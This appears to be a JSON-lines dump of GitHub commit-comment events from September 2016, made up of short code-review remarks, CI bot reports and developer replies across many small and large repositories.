{"id":"4570196186","type":"CommitCommentEvent","actor":{"login":"astronouth7303"},"repo":{"name":"santagada/xontrib-powerline"},"payload":{"comment":{"id":19042910,"position":38,"line":38,"path":"xontrib/powerline.xsh","commit_id":"3147dbe20492dfb54fa29cb9db71b63e7f696620","created_at":"2016-09-15T19:27:22Z","updated_at":"2016-09-15T19:27:22Z","body":"You can query Vox for this information. In fact, I highly encourage it.\r\n\r\n(Especially since there's a feature request to support conda venvs.)"}},"created_at":"2016-09-15T19:27:22Z"}
{"id":"4570197701","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042915,"position":30,"line":30,"path":"tests/server/models/user-test.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:27:38Z","updated_at":"2016-09-15T19:27:38Z","body":"If you want to mark an entire suite as pending you can use `xdescribe` instead of doing `xit` for each spec."}},"created_at":"2016-09-15T19:27:38Z"}
{"id":"4570197799","type":"CommitCommentEvent","actor":{"login":"damiansb"},"repo":{"name":"damiansb/dbo"},"payload":{"comment":{"id":19042916,"position":null,"line":null,"path":null,"commit_id":"951b24e6438e06b90ae3fc15a9556351b926f0a0","created_at":"2016-09-15T19:27:40Z","updated_at":"2016-09-15T19:27:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BhLyDK1d&#x2F;64-alteracoes-no-dbo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Alterações no DBO</a>"}},"created_at":"2016-09-15T19:27:40Z"}
{"id":"4570198721","type":"CommitCommentEvent","actor":{"login":"kondors1995"},"repo":{"name":"mparus/android_device_huawei_g760-caf"},"payload":{"comment":{"id":19042918,"position":null,"line":null,"path":null,"commit_id":"2f2f155e62ac22d51835dbe2c0d4e7064ae922ae","created_at":"2016-09-15T19:27:51Z","updated_at":"2016-09-15T19:27:51Z","body":"you found 64 bit sources for hauwei device?"}},"created_at":"2016-09-15T19:27:51Z"}
{"id":"4570198915","type":"CommitCommentEvent","actor":{"login":"csnyulas"},"repo":{"name":"protegeproject/mapping-master"},"payload":{"comment":{"id":19042919,"position":5,"line":61,"path":"src/main/java/org/mm/core/ReferenceType.java","commit_id":"cde136508ed5d0edc96d73fcdddaa1bdcfed710b","created_at":"2016-09-15T19:27:53Z","updated_at":"2016-09-15T19:27:53Z","body":"I wouldn't have named this OWL_IRI, just simply IRI, as IRI is not an OWL specific concept. Would the token/constant \"IRI\" be ambiguous, or conflict with something?"}},"created_at":"2016-09-15T19:27:53Z"}
{"id":"4570198934","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19042920,"position":3,"line":3,"path":"backend/schemas/queueSong.js","commit_id":"21a4dfb18f739166a173f1fdb11af2f87c5f676b","created_at":"2016-09-15T19:27:53Z","updated_at":"2016-09-15T19:27:53Z","body":"Should be using `const` 😉 "}},"created_at":"2016-09-15T19:27:53Z"}
{"id":"4570199650","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042922,"position":84,"line":84,"path":"tests/server/routes/men-test.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:28:02Z","updated_at":"2016-09-15T19:28:02Z","body":"Glad to see you have tests! Have you set up CI?"}},"created_at":"2016-09-15T19:28:02Z"}
{"id":"4570201467","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042926,"position":null,"line":null,"path":null,"commit_id":"e06aeb476c5fe76b0cd68ba258a15d8a4993388e","created_at":"2016-09-15T19:28:23Z","updated_at":"2016-09-15T19:28:23Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35486/testReport/) for this commit**"}},"created_at":"2016-09-15T19:28:23Z"}
{"id":"4570203927","type":"CommitCommentEvent","actor":{"login":"DanielAndreasen"},"repo":{"name":"DanielAndreasen/SWEET-Cat"},"payload":{"comment":{"id":19042933,"position":null,"line":null,"path":null,"commit_id":"be56459aecbbaaad09f564a6f8231b821794b7d3","created_at":"2016-09-15T19:28:52Z","updated_at":"2016-09-15T19:28:52Z","body":"Just to be clear. This just go through all the new stars automatically so you don't have to do: `python addNewhost.py starname`?\r\nDon't be afraid of deleting stuff (the parser things). If we make a mistake we can find it again."}},"created_at":"2016-09-15T19:28:52Z"}
{"id":"4570207289","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042938,"position":null,"line":null,"path":null,"commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:29:33Z","updated_at":"2016-09-15T19:29:33Z","body":"You have 39 linter warnings! Are you keeping `gulp` running at all times? Do you have ESLint integrated into your editor(s) of choice?"}},"created_at":"2016-09-15T19:29:33Z"}
{"id":"4570212595","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042948,"position":89,"line":89,"path":"server/app/configure/authentication/local.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:30:35Z","updated_at":"2016-09-15T19:30:35Z","body":"Nice use of Express error handling."}},"created_at":"2016-09-15T19:30:35Z"}
{"id":"4570213115","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042950,"position":59,"line":59,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:30:41Z","updated_at":"2016-09-15T19:30:41Z","body":"would keep the naming consistent: /:id or may be /:userId for post, get, delete routes  "}},"created_at":"2016-09-15T19:30:41Z"}
{"id":"4570219409","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042960,"position":60,"line":60,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:31:50Z","updated_at":"2016-09-15T19:31:50Z","body":"I think you need to have request.params.itemToDelete instead of userId"}},"created_at":"2016-09-15T19:31:50Z"}
{"id":"4570219539","type":"CommitCommentEvent","actor":{"login":"itcentrecourses"},"repo":{"name":"itcentrecourses/RepositoryBase004"},"payload":{"comment":{"id":19042961,"position":null,"line":null,"path":null,"commit_id":"cd8e1475a46b457a6f458bba561c1ed6bd127e23","created_at":"2016-09-15T19:31:51Z","updated_at":"2016-09-15T19:31:51Z","body":"При перестановке элементов, используй метод set():\r\n\r\ntmp = employee.get(j);\r\nemployee.set(j, employee.get((j - 1)));\r\nemployee.set((j - 1), tmp);\r\n\r\nДанный вариант должен помочь, так как метод add() \"по индексу\" добавляет новый элемент сдвигая все остальные на позицию вправо."}},"created_at":"2016-09-15T19:31:51Z"}
{"id":"4570220273","type":"CommitCommentEvent","actor":{"login":"jailuthra"},"repo":{"name":"360Controller/360Controller"},"payload":{"comment":{"id":19042964,"position":null,"line":null,"path":null,"commit_id":"51b5b38d0bf7b60780b86ca008f748b6f9735b28","created_at":"2016-09-15T19:32:00Z","updated_at":"2016-09-15T19:32:00Z","body":"Thanks sooo much for this update, I'm able to play Portal 2 using my logitech f310 :+1:"}},"created_at":"2016-09-15T19:32:00Z"}
{"id":"4570221344","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19042970,"position":19,"line":29,"path":"text_wrap.py","commit_id":"8944ec36077d80eeb60952800fb31d9ca47e31fa","created_at":"2016-09-15T19:32:14Z","updated_at":"2016-09-15T19:32:14Z","body":"args = parser.parse_args()\r\nmaxlen = args.maxlength\r\nfilename = args.filename"}},"created_at":"2016-09-15T19:32:14Z"}
{"id":"4570222743","type":"CommitCommentEvent","actor":{"login":"djxy"},"repo":{"name":"djxy/PermissionManager-2.0"},"payload":{"comment":{"id":19042973,"position":8,"line":59,"path":"pom.xml","commit_id":"1642acaffe179a05b24683f03a2755e561005827","created_at":"2016-09-15T19:32:28Z","updated_at":"2016-09-15T19:32:28Z","body":"I have the jar in the file lib. I wasn't able to get the new version of FoxGuard with jitpaick.io"}},"created_at":"2016-09-15T19:32:28Z"}
{"id":"4570223238","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":19042976,"position":2,"line":2,"path":"styles/player_bar.css","commit_id":"ae4c69e42a89d5f795eb86c5b900f19c8b9f00f7","created_at":"2016-09-15T19:32:34Z","updated_at":"2016-09-15T19:32:34Z","body":"so many tabs! Why? :)"}},"created_at":"2016-09-15T19:32:34Z"}
{"id":"4570223920","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042979,"position":null,"line":null,"path":null,"commit_id":"715013bdccc45c495185d261ef7cca54e2100db0","created_at":"2016-09-15T19:32:41Z","updated_at":"2016-09-15T19:32:41Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35487/testReport/) for this commit**"}},"created_at":"2016-09-15T19:32:41Z"}
{"id":"4570227735","type":"CommitCommentEvent","actor":{"login":"twicejr"},"repo":{"name":"twicejr/cpp"},"payload":{"comment":{"id":19042995,"position":42,"line":228,"path":"www/build/js/app.bundle.js","commit_id":"aa84234c25eb65747f89089318fea8b58a474eee","created_at":"2016-09-15T19:33:26Z","updated_at":"2016-09-15T19:33:26Z","body":"to"}},"created_at":"2016-09-15T19:33:26Z"}
{"id":"4570228078","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042997,"position":104,"line":104,"path":"server/app/configure/authentication/local.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:33:30Z","updated_at":"2016-09-15T19:33:30Z","body":"Don't forget promise chain error handling!"}},"created_at":"2016-09-15T19:33:30Z"}
{"id":"4570229117","type":"CommitCommentEvent","actor":{"login":"bastimeyer"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19043000,"position":null,"line":null,"path":null,"commit_id":"feaa6dc956c979547234f5edb534e62da2857852","created_at":"2016-09-15T19:33:42Z","updated_at":"2016-09-15T19:33:42Z","body":"Sorry to bother again, but there is a better solution for the Livestreamer ClientID issue without any authentication restrictions.\r\n@InfernoZeus @scowalt @NGMarmaduke \r\nThanks!"}},"created_at":"2016-09-15T19:33:42Z"}
{"id":"4570229832","type":"CommitCommentEvent","actor":{"login":"yihengli"},"repo":{"name":"yihengli/ECharts2Shiny"},"payload":{"comment":{"id":19043005,"position":null,"line":null,"path":null,"commit_id":"dc0f276238696a7269395eced82f3badfe38f726","created_at":"2016-09-15T19:33:53Z","updated_at":"2016-09-15T19:33:53Z","body":"Hi, @XD-DENG \r\n\r\nLike I used to say, the package you've done is brilliant. I guess I will keep using it as long as I am still using R to do my data-vis work. \r\n\r\nI am new to Github and not sure if I've made everything correct. What do you mean by \"add it back to master repo\"? For my most recent updates, it doesn't involve any new features. I simply customized some themes using Echart's theme builder tools on their official web. The only reason I forked this out from your master repo is that I may import some customized themes for myself and don't want to confuse other users.\r\n\r\nAnd thanks for the reminder that new features have been added in the master. I guess I will try it just soon. Recently I may do some work about also integrating echart's funnel plot. At that time, I may make a pull to your master repo? Or are there any other ways in Github that can make this process easier?"}},"created_at":"2016-09-15T19:33:53Z"}
{"id":"4570233036","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043014,"position":37,"line":37,"path":"server/app/configure/authentication/local.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:34:29Z","updated_at":"2016-09-15T19:34:29Z","body":"Nesting `.then`? Tsk tsk. You can make this chain flat. Also, use `Promise.all` for independent promises — no need for these to be sequential."}},"created_at":"2016-09-15T19:34:29Z"}
{"id":"4570234685","type":"CommitCommentEvent","actor":{"login":"nickdrozd"},"repo":{"name":"nickdrozd/lispinc"},"payload":{"comment":{"id":19043022,"position":null,"line":null,"path":null,"commit_id":"7f0d30a7f17c6b81750888179cb05880de4ada9c","created_at":"2016-09-15T19:34:48Z","updated_at":"2016-09-15T19:34:48Z","body":"this edit reduced github's C++ estimate by 1% exactly"}},"created_at":"2016-09-15T19:34:48Z"}
{"id":"4570235250","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19043025,"position":13,"line":56,"path":"shared/src/main/scala/Syntax.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-15T19:34:55Z","updated_at":"2016-09-15T19:34:55Z","body":"Eval(s) does not have facets because s can't have facets.  s can't have facets because facets are only created at runtime and users can't right them down."}},"created_at":"2016-09-15T19:34:55Z"}
{"id":"4570235577","type":"CommitCommentEvent","actor":{"login":"jpswade"},"repo":{"name":"oneclickorgs/one-click-orgs"},"payload":{"comment":{"id":19043026,"position":null,"line":null,"path":null,"commit_id":"42d777f3762c0237fcd68167cc7993425fcf3cf0","created_at":"2016-09-15T19:34:59Z","updated_at":"2016-09-15T19:34:59Z","body":"This is hard coded for every organisation. Is there any way we can switch this out?"}},"created_at":"2016-09-15T19:34:59Z"}
{"id":"4570236086","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19043029,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-15T19:35:06Z","updated_at":"2016-09-15T19:35:06Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-MacOS-10.9-clang: OK (2330 of 2331 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T19:35:06Z"}
{"id":"4570236775","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043032,"position":19,"line":19,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:35:15Z","updated_at":"2016-09-15T19:35:15Z","body":"Can use `findById`"}},"created_at":"2016-09-15T19:35:15Z"}
{"id":"4570237425","type":"CommitCommentEvent","actor":{"login":"waldyrconde"},"repo":{"name":"waldyrconde/Projeto"},"payload":{"comment":{"id":19043036,"position":null,"line":null,"path":null,"commit_id":"1a5dc47d972463c8223b8adc83d218e56a293dbe","created_at":"2016-09-15T19:35:22Z","updated_at":"2016-09-15T19:35:22Z","body":"<?php\r\n\r\nif (isset($_POST[\"valor\"])) {\r\n    $valor = $_POST[\"valor\"];\r\n    $valorComissão = $valor * 0.05;\r\n    $valorTaxa = 650;\r\n    $valorFinal = $valor + $valorComissão + $valorTaxa;\r\n    $valorLance1 = $valor + 100;\r\n\t$valorLance2 = $valor + 200;\r\n\t$valorLance3 = $valor + 500;\r\n\t$valorLance4 = $valor + 1000;\r\n\t\r\n}\r\n \r\n?>\r\n\r\n<html>\r\n<head>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"estilo.css\">\r\n</style>\r\n</head>\r\n<body>\r\n<form>\r\n<h1><p class=\"ex\"align=left>Selecione o Banco:</p>\r\n <select name=\"bancos\">\r\n  <option>Bradesco\r\n  <option>Itau\r\n  <option>Panamericano\r\n  <option>Santander\r\n </select>\r\n</form>\r\n<form method=\"post\" action=\"http://localhost/teste/waldyr.php\">\r\n    <h2><p align=center><b>Digite o Valor do Lance: </b><input type=\"text\" name=\"valor\" />\r\n    <button class=\"total\">Total</button>\r\n</form>\r\n<form method=\"post\" action=\"http://localhost/teste/waldyr.php\">\r\n    <p align=center><input type=\"hidden\" name=\"valor\" value=\"<?php echo $valorLance1; ?>\"/>\r\n    <button class=\"+100\">+ 100</button>\r\n</form>\r\n<form method=\"post\" action=\"http://localhost/teste/waldyr.php\">\r\n    <p align=center><input type=\"hidden\" name=\"valor\" value=\"<?php echo $valorLance2; ?>\"/>\r\n    <button class=\"200\">+ 200</button>\r\n</form>\r\n<form method=\"post\" action=\"http://localhost/teste/waldyr.php\">\r\n    <p align=center><input type=\"hidden\" name=\"valor\" value=\"<?php echo $valorLance3; ?>\"/>\r\n    <button class=\"500\">+ 500</button>\r\n</form>\r\n<form method=\"post\" action=\"http://localhost/teste/waldyr.php\">\r\n    <p align=center><input type=\"hidden\" name=\"valor\" value=\"<?php echo $valorLance4; ?>\"/>\r\n    <button class=\"1000\">+ 1000</button>\r\n</form>\r\n<h3><b><p align=center>Valor do Lance = R$ <?php echo number_format($valor,2); ?></p>\r\n<h4><p align=center>Valor Final = R$ <?php echo number_format($valorFinal,2); ?></p></b>\r\n</body>\r\n</html>"}},"created_at":"2016-09-15T19:35:22Z"}
{"id":"4570240115","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043042,"position":26,"line":26,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:35:54Z","updated_at":"2016-09-15T19:35:54Z","body":"Careful, you have a promise chain inside a promise chain — there is a potential for errors to be silently swallowed here. `return` the chain!"}},"created_at":"2016-09-15T19:35:54Z"}
{"id":"4570240623","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043044,"position":14,"line":14,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:36:01Z","updated_at":"2016-09-15T19:36:01Z","body":"Nice way to make the code DRY and more efficient"}},"created_at":"2016-09-15T19:36:01Z"}
{"id":"4570245049","type":"CommitCommentEvent","actor":{"login":"davidsbailey"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19043058,"position":17,"line":29,"path":"apps/src/applab/dataBrowser/EditTableRow.jsx","commit_id":"3dee3c851d432369e9325c80c72589d86d9c4304","created_at":"2016-09-15T19:36:54Z","updated_at":"2016-09-15T19:36:54Z","body":"The component is re-rendered because the parent component is re-rendered. A vague explanation is offered here for why rendering is not skipped by default:\r\n\r\n```\r\nBy default, shouldComponentUpdate always returns true to prevent subtle bugs when state is mutated in place, but if you are careful to always treat state as immutable and to read only from props and state in render() then you can override shouldComponentUpdate with an implementation that compares the old props and state to their replacements.\r\n\r\nIf performance is a bottleneck, especially with dozens or hundreds of components, use shouldComponentUpdate to speed up your app.\r\n```\r\n\r\nhttps://facebook.github.io/react/docs/component-specs.html#updating-shouldcomponentupdate"}},"created_at":"2016-09-15T19:36:54Z"}
{"id":"4570246026","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043061,"position":19,"line":19,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:37:07Z","updated_at":"2016-09-15T19:37:07Z","body":"This is not very RESTful. `GET /cart/123` should get cart #123, not get the cart for user #123. That should either be `GET /user/123/cart`, or `GET /cart?userId=123`."}},"created_at":"2016-09-15T19:37:07Z"}
{"id":"4570250231","type":"CommitCommentEvent","actor":{"login":"eXeDK"},"repo":{"name":"remixz/messenger-bot"},"payload":{"comment":{"id":19043070,"position":null,"line":null,"path":null,"commit_id":"5cb0c4907c6783beb05607f8b06d075c9ce5714c","created_at":"2016-09-15T19:37:54Z","updated_at":"2016-09-15T19:37:54Z","body":"Hi Yura,\r\nPlease create a pull request to remixz/messenger-bot so we can add this good progress."}},"created_at":"2016-09-15T19:37:54Z"}
{"id":"4570250557","type":"CommitCommentEvent","actor":{"login":"felipesanches"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19043071,"position":null,"line":null,"path":null,"commit_id":"649cb254f5b6d3b886c8476ace84e2fccfa0633b","created_at":"2016-09-15T19:37:58Z","updated_at":"2016-09-15T19:37:58Z","body":"Awesome!"}},"created_at":"2016-09-15T19:37:58Z"}
{"id":"4570250948","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043073,"position":34,"line":34,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:38:04Z","updated_at":"2016-09-15T19:38:04Z","body":"Why `:itemName` — I thought this was posting to a cart route? That should make a new cart."}},"created_at":"2016-09-15T19:38:04Z"}
{"id":"4570252077","type":"CommitCommentEvent","actor":{"login":"santagada"},"repo":{"name":"santagada/xontrib-powerline"},"payload":{"comment":{"id":19043078,"position":38,"line":38,"path":"xontrib/powerline.xsh","commit_id":"3147dbe20492dfb54fa29cb9db71b63e7f696620","created_at":"2016-09-15T19:38:16Z","updated_at":"2016-09-15T19:38:16Z","body":"Cool,  will look into it"}},"created_at":"2016-09-15T19:38:16Z"}
{"id":"4570253336","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043084,"position":36,"line":36,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:38:30Z","updated_at":"2016-09-15T19:38:30Z","body":"where is `userId` defined?"}},"created_at":"2016-09-15T19:38:30Z"}
{"id":"4570253397","type":"CommitCommentEvent","actor":{"login":"felipesanches"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19043085,"position":null,"line":null,"path":null,"commit_id":"649cb254f5b6d3b886c8476ace84e2fccfa0633b","created_at":"2016-09-15T19:38:31Z","updated_at":"2016-09-15T19:38:31Z","body":"And then someday we may 3d model the car :-)\r\n\r\n#388 "}},"created_at":"2016-09-15T19:38:31Z"}
{"id":"4570254329","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043089,"position":60,"line":60,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:38:42Z","updated_at":"2016-09-15T19:38:42Z","body":"what `userId`? This is not defined."}},"created_at":"2016-09-15T19:38:42Z"}
{"id":"4570254935","type":"CommitCommentEvent","actor":{"login":"acsferreira"},"repo":{"name":"DanielAndreasen/SWEET-Cat"},"payload":{"comment":{"id":19043091,"position":null,"line":null,"path":null,"commit_id":"be56459aecbbaaad09f564a6f8231b821794b7d3","created_at":"2016-09-15T19:38:50Z","updated_at":"2016-09-15T19:38:50Z","body":"Yes that is it.\r\nI will add something later to include the star sorted in the WEBSITE_online.rdb and to add all the information manually when not found. Then I want to search the stars by position not by name (in a remote future)."}},"created_at":"2016-09-15T19:38:50Z"}
{"id":"4570257931","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043101,"position":14,"line":14,"path":"server/app/routes/cart/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:39:24Z","updated_at":"2016-09-15T19:39:24Z","body":"you could save the user id on request object to use it later like: req.userId"}},"created_at":"2016-09-15T19:39:24Z"}
{"id":"4570259591","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19043104,"position":null,"line":null,"path":null,"commit_id":"1161837bcba4da2aae9a4f407d3e4c5deb652f43","created_at":"2016-09-15T19:39:43Z","updated_at":"2016-09-15T19:39:43Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35488/testReport/) for this commit**"}},"created_at":"2016-09-15T19:39:43Z"}
{"id":"4570261965","type":"CommitCommentEvent","actor":{"login":"CNG"},"repo":{"name":"FJD-CEPH/CNView"},"payload":{"comment":{"id":19043107,"position":null,"line":null,"path":null,"commit_id":"1ed5d9fc229b93227376d11fa349eb86a4aa82f3","created_at":"2016-09-15T19:40:14Z","updated_at":"2016-09-15T19:40:14Z","body":"Thanks for the mention."}},"created_at":"2016-09-15T19:40:14Z"}
{"id":"4570264729","type":"CommitCommentEvent","actor":{"login":"jbkempf"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19043113,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-15T19:40:43Z","updated_at":"2016-09-15T19:40:43Z","body":"We want to load the VLC plugins with LOAD_LIBRARY_SEARCH_SYSTEM32 | LOAD_LIBRARY_SEARCH_APPLICATION_DIR | LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR; but we do want every LoadLibrary called from the plugins, the core and the 3rd party libraries to only use SYS32 and clearly nothing else, especially not APPLICATION_DIR or LOAD_DIR.\r\n\r\nAnd this is a security issue, so we do need to make that in all VLC and libVLC based applications. Else, people will complain to us.\r\n\r\nAlso, why don't other applications call SetDefaultDllDirectory before init VLC, if they want a different behaviour?"}},"created_at":"2016-09-15T19:40:43Z"}
{"id":"4570265264","type":"CommitCommentEvent","actor":{"login":"KugiHaito"},"repo":{"name":"KugiHaito/mykugi"},"payload":{"comment":{"id":19043114,"position":null,"line":null,"path":null,"commit_id":"f289a2ae7228dc7e9a2433d53f8d412621a47af6","created_at":"2016-09-15T19:40:49Z","updated_at":"2016-09-15T19:40:49Z","body":"Meu Portifolio - Atualizado"}},"created_at":"2016-09-15T19:40:49Z"}
{"id":"4570266521","type":"CommitCommentEvent","actor":{"login":"mike9ar"},"repo":{"name":"mike9ar/prueba"},"payload":{"comment":{"id":19043121,"position":null,"line":null,"path":null,"commit_id":"52ce6ae292ba24969b584c5ae423fd798d64b7e4","created_at":"2016-09-15T19:41:03Z","updated_at":"2016-09-15T19:41:03Z","body":"Falta un detalle, mirá bien el comentario anterior"}},"created_at":"2016-09-15T19:41:03Z"}
{"id":"4570267996","type":"CommitCommentEvent","actor":{"login":"Pranoydll"},"repo":{"name":"TheOverlord23/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":19043123,"position":null,"line":null,"path":null,"commit_id":"eba17ed066f326b0b0d02d50c4f48c7871e85419","created_at":"2016-09-15T19:41:21Z","updated_at":"2016-09-15T19:41:21Z","body":"no"}},"created_at":"2016-09-15T19:41:21Z"}
{"id":"4570268610","type":"CommitCommentEvent","actor":{"login":"nymanjens"},"repo":{"name":"nymanjens/Alliances"},"payload":{"comment":{"id":19043124,"position":null,"line":null,"path":null,"commit_id":"1ce734cf762b0b09f9c513a4a8b0004ed54c68db","created_at":"2016-09-15T19:41:27Z","updated_at":"2016-09-15T19:41:27Z","body":"Fixed in https://github.com/nymanjens/Alliances/commit/cc89551324f07dc371f0689ad46a0e078ec16607"}},"created_at":"2016-09-15T19:41:27Z"}
{"id":"4570271246","type":"CommitCommentEvent","actor":{"login":"russellTaradel"},"repo":{"name":"Taradel/taradashboard"},"payload":{"comment":{"id":19043128,"position":null,"line":null,"path":null,"commit_id":"28a51c8c618a8ee6f8ccc539f0cb8621210e8d4b","created_at":"2016-09-15T19:41:58Z","updated_at":"2016-09-15T19:41:58Z","body":"deleteing"}},"created_at":"2016-09-15T19:41:58Z"}
{"id":"4570272813","type":"CommitCommentEvent","actor":{"login":"rschick"},"repo":{"name":"mikepaulsond2l/node-auth-validation"},"payload":{"comment":{"id":19043135,"position":null,"line":null,"path":null,"commit_id":"a07282177ec21b5b77c06a4938517b1e6d9de762","created_at":"2016-09-15T19:42:17Z","updated_at":"2016-09-15T19:42:17Z","body":"Did you submit a PR for this?"}},"created_at":"2016-09-15T19:42:17Z"}
{"id":"4570274010","type":"CommitCommentEvent","actor":{"login":"benjaminaltieri"},"repo":{"name":"berkeleyapplied/baa_messages"},"payload":{"comment":{"id":19043138,"position":16,"line":31,"path":"setup.py","commit_id":"d7edba7cf19f8af50c09002356b21a71afbf8fbb","created_at":"2016-09-15T19:42:31Z","updated_at":"2016-09-15T19:42:31Z","body":"@gwincr11 Should this be in requirements above? Motivation: when importing via pip install -r requirements in MURSRadSystem, IPython does not get installed."}},"created_at":"2016-09-15T19:42:31Z"}
